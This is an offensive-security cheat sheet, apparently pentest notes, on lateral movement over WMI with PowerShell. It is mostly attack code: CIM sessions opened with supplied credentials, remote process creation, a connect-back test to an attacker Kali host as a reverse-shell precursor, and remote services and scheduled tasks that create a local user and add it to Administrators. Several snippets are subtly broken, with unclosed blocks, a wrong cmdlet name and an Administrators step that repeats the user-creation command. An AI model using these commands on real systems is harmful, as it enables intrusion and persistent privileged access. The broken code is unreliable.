Moving laterally using wmi

Connecting to wmi from powershell

Create a credential object for authentication

$username = ''
$password = 'password' | ConvertTo-SecureString -AsPlainText -Force
$credential = [pscredential]::new($username, $password)

Create a CIM session for repeated use:

  • DCOM: Connect to the target via RPC on TCP/135 , RPC will direct the client to high numbered port TCP/49152-65535

  • WSman: WinRM – connect via HTTP (TCP/5985) or HTTPS (TCP/5986)

$server = 'target-ip / fqdn'
$sessionopt = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName $server -Credential $credential -SessionOption $sessionopt -ErrorAction Stop

Remote process creation

We can remotely spawn a process from Powershell by leveraging Windows Management Instrumentation (WMI), sending a WMI request to the Win32_Process class to spawn the process under the session we created before:

$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value whatever";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command

WMI will create the required process silently (it does not show the output of any command).

On legacy systems, the same can be done using wmic from the command prompt:

wmic.exe /user:<username> /password:<password> /node:TARGET process call create "cmd.exe /c calc.exe" 

Run a command remotely

Run a command in the CIM session to test if the target can connect back to the attack machine as a pre-check to a reverse shell. Used is Parameter splatting. With many thanks to 0xBEN.

$kaliVpnIP = 'kali-vpn-ip'
$kaliPort = 443

# Try to connect back to Kali on a TCP port of choice
$command = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `"[Net.Sockets.TcpClient]::new().ConnectAsync('$kaliVpnIP', $kaliPort)`""

# Parameter splatting
$parameters = @{
    CimSession = $session
    ClassName = 'Win32_Process'
    MethodName = 'Create'
    Arguments = @{
        CommandLine = $command
Invoke-CimSession @parameters

Creating services remotely

Register a service called fakeservice on the target. This only creates the service and does not execute the command specified in PathName:

$parameters = @{
    CimSession = $session
    ClassName = 'Win32_Service'
    MethodName = 'Create'
    Arguments = @{
        Name = 'fakeservice'
        DisplayName = 'fakeservice'
        PathName = 'net user <username> <password> /ADD'
        ServiceType = [byte]16
        StartMode = 'Manual'
Invoke-CimMethod @parameters

Get the service and run it on the target. This will cause the service to run and create the local user username with a password of password.

$svc = Get-CimInstance -CimSession $session -ClassName Win32_Service -Filter "Name LIKE 'fakeservice'"
$svc | Invoke-CimMethod -MethodName StartService

Change the command and add the username user to the local Administrators group.

$svc | Invoke-CimMethod -MethodName Change -Arguments @{PathName = 'net localgroup Administrators <username> /ADD'}
$svc | Invoke-CimMethod -MethodName StartService


$svc | Invoke-Cimmethod -MethodName StopService
$svc | Invoke-CimMethod -MethodName Delete

Scheduled tasks

The action is to run:

cmd.exe /c net user add <username> <password> /ADD` . 

Payload must be split in command and arguments:

$command = 'cmd.exe'
$arguments = '/c net user <username> <password> /ADD'
$parameters = @{
    CimSession = $session
    Execute = $command
    Argument = $arguments
$action = New-ScheduledTaskAction @parameters

Create the task on the remote host and assign it the action stored in the $action variable, then start the task:

$parameters = @{
    CimSession = $session
    Action = $action
    TaskName = 'taskname'
$task = Register-ScheduledTask @parameters
$task | Start-ScheduledTask

Add the username user to the local administrators group:

$arguments = '/c net user <username> <password> /ADD'
$parameters = @{
    CimSession = $session
    Execute = $command
    Argument = $arguments
$action = New-ScheduledTaskAction @parameters
$task = Set-ScheduledTask -CimSession $session -TaskName taskname -Action $action
$task | Start-ScheduledTask
$task | Unregister-ScheduledTask